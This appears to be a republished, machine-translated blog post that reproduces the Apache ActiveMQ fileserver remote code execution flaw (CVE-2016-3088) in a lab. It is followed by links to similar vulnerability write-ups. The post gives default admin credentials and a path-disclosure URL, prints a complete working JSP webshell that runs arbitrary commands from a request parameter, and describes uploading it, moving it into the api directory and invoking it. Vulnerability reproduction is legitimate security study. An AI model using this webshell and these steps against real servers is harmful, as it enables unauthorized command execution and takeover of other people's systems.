Apache ActiveMQ Remote Code Execution Vulnerability (CVE-2016-3088) reproduction - Code World

Apache ActiveMQ Remote Code Execution Vulnerability (CVE-2016-3088) reproduction

Others 2019-09-04 21:14:12 views: null

Vulnerability reproduction

Direct write shell

Write shell then need to write in admin or api, that is need to log in without a password, then can not complete write shell operation.

The environment default password is admin / admin.

Visit http: // ip: 8161 / admin / test / systemProperties.jsp

Get the path of the current system

Jsp upload pony, return 204, but does not resolve in the fileserver path

小马
<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>

Then move to the directory api, successful, returns 204 No Content

Excuting an order

http://192.168.73.151:8161/api/9.jsp?cmd=ls

Guess you like

Origin www.cnblogs.com/xyongsec/p/11459542.html

Apache ActiveMQ Remote Code Execution Vulnerability (CVE-2016-3088) reproduction

Apache ActiveMQ Remote Code Execution Vulnerability (CVE-2016-3088)

Apache ActiveMQ Fileserver Remote Code Execution Vulnerability (CVE-2016-3088)

Apache ActiveMQ Remote Code Execution Vulnerability (CVE-2016-3088) analysis

[Reproduction] vulnerability Apache Solr via Velocity template remote code execution

CVE-2019-0708 Remote Code Execution Vulnerability reproduction Desktop

CVE-2021-21972 Vmware Remote Code Execution Vulnerability Reproduction

Apache Shiro deserialization remote code execution reproduction

[Reproduction] Apache Flink vulnerability Jar package upload any cause remote code execution

Apache RocketMQ Remote Code Execution Vulnerability (CVE-2023-33246)

CVE-2023-37582 Apache RocketMQ Remote Code Execution Vulnerability

Apache RocketMQ Remote Code Execution Vulnerability (CVE-2023-37582)

CVE-2016-5734 Phpmyadmin background code execution vulnerability reproduction

Apache ActiveMQ remote code execution vulnerability recurrence (CNVD-2023-69477)

IIS6 remote code execution vulnerability reproduction CVE-2017-7269

PHP-FPM Remote Code Execution Vulnerability (CVE-2019-11043) simple reproduction study

[vulhub vulnerability recurrence] CVE-2016-3088 ActiveMQ arbitrary file writing vulnerability

[Notice] Apache ShardingSphere Vulnerability Remote Code Execution Vulnerability (CVE-2020-1947) Notice

[vulhub vulnerability recurrence] CVE-2021-44228 Apache Log4j remote code execution vulnerability

Vulnerability reproduction: MS12-020 Remote Desktop Protocol (RDP) Remote Code Execution Vulnerability

Kibana <6.6.1 code execution vulnerability reproduction CVE-2019-7609

Vulnerability reproduction: MS14-064 OLE Remote Code Execution Vulnerability

[Vulnerability recurrence] Apache Druid remote code execution CVE-2021-25646

Apache Unomi remote code execution vulnerability (CVE-2020-13942) reproduced

CVE-2021-31805|Apache Struts2 remote code execution vulnerability warning

CVE-2023-37582 Apache RocketMQ Update Configuration Remote Code Execution Vulnerability

[Medium Risk] Apache Airflow ODBC Provider Remote Code Execution Vulnerability

ActiveMQ Jolokia code execution vulnerability (CVE-2022-41678) reappears

Thinkphp5 5.0.22/5.1.29 remote code execution vulnerability + webshell tool connection (detailed reproduction process)

Typora remote code execution vulnerability

Recommended

The sixth meeting of openKylin Community Ecology Committee was successfully held

Alibaba Cloud officially releases Tongyi Qianwen 2.5

Python 3.13 releases first Beta: experimental free-threading mode and JIT, improved interactive interpreter

Stack Overflow used my code to train large AI models and banned my account.

Pop!_OS’s COSMIC desktop completes App Store listing

Report: Django is still the first choice for 74% of developers

"Internet Investment and Financing Operation in the First Quarter of 2024" Research Report

15 years ago, he was on the "FFmpeg pillar of shame", and today he still has to thank us - Tencent QQPlayer avenges its shame?

Ranking

Python handwritten digit recognition, the corresponding mathematical formulas and Detailed procedures

Der M-Chip-Mac implementiert mehrere Android-Emulatoren

CentOS 명령줄 모드에서 화면이 항상 켜져 있도록 설정 ---- 예상한 효과를 얻지 못했습니다.

Teach you step by step how to use GDB to debug programs: a comprehensive guide from entry to mastery

python3 pip ipython installation

A lot of python crawler source code sharing -- talk about the little thing about python crawler

Agile Sprint in Alpha Stage (7)

Access URL in Unity

FunctoinDemo form

MS SQL common SQL statements (6): create, modify, delete triggers and other operations sq

Daily

More

2024-05-10(34)

2024-05-09(32)

2024-05-08(18)

2024-05-07(34)

2024-05-06(6)

2024-05-05(0)

2024-05-04(18)

2024-05-03(8)

2024-05-02(0)

2024-05-01(4)